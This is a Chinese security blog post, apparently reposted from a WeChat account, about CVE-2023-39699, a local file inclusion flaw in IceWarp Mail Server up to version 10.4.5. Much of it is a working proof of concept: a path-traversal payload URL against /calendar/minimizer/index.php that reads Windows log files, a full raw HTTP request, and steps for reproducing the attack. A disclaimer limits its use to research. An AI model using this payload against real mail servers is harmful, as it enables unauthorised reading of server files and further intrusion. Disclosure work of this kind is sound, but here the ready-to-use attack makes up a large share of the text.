简介
为电子邮件提供保障,实现工作计划制定,实时协作,云存储和文档编辑。拥有Microsoft Outlook集成,桌面工具除个人桌面电子邮件客户端外,更有Office工具替代套件。
开发语言:PHP官网地址:http://www.icewarp.cn/
漏洞描述
爱思华宝邮件服务器 v10.4.5 被发现通过组件 /calendar/minimizer/index.php 包含本地文件包含 (LFI) 漏洞。此漏洞允许攻击者包含或执行目标服务器本地文件系统中的文件。
影响版本
IceWarp Mail Server ≤ v10.4.5
空间测绘
回复“CVE-2023-39699”获取空间测绘搜索语句漏洞利用
pyaload
https://xxx.xxx.xxx/webmail/calendar/minimizer/index.php?style={path_file}................%2fwindows%2fwindowsupdate%2elog................%2fwindows%2fsystem32%2flogfiles%2fhttperr%2fhttperrl%2elog
payload数据包
GET/-.._._.--.._1384876090/webmail/calendar/minimizer/index.php?style=................%2fwindows%2fwindowsupdate%2elogHTTP/1.1Host: xxx.xxx.xxxCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (X11; U; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5760.194 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateReferer: http://xxx.xxx.xxx/Origin: http://xxx.xxx.xxx/webmail/Accept-Language: zh-CN,zh;q=0.9Cookie: use_cookies=1Connection: close
1.访问邮件服务器主页
2.查看源代码,随便点击一个含有“-....--.._”的CSS或JS文件
3.url拼接上payload访问即可
Burp请求截图
参考链接
https://nvd.nist.gov/vuln/detail/CVE-2023-39699https://drive.google.com/file/d/1NkqL4ySJApyPy8B-zDC7vE-QMBQAu8OU
回复“CVE-2023-39699”获取空间测绘语句
仅供学习交流,勿用作违法犯罪
原文始发于微信公众号(不够安全):CVE-2023-39699:爱思华宝邮件服务器 本地文件包含漏洞 附POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论